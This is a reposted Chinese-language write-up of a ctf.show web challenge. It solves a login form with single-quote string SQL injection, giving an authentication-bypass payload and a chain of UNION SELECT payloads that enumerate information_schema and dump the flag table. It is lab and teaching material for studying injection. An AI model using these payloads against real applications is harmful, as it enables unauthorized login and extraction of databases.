ctfshow-WEB-web2

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可

 img

 

在用户名的输入框中输入万能账号 a' or true #,密码随便输

img

 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库

img

 

首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,2,3 #

 img

 

接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中

a' union select 1,database(),3 #

img

 

数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,
(select group_concat(table_name) from information_schema.tables
where table_schema='web2')
,3 #

img

 

接下来获取flag表的字段

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

img

 

接下来获取flag表的数据

a' union select 1,(select flag from flag),3 #

img

将flag的内容整体复制到输入框中即可过关 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/119803269
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复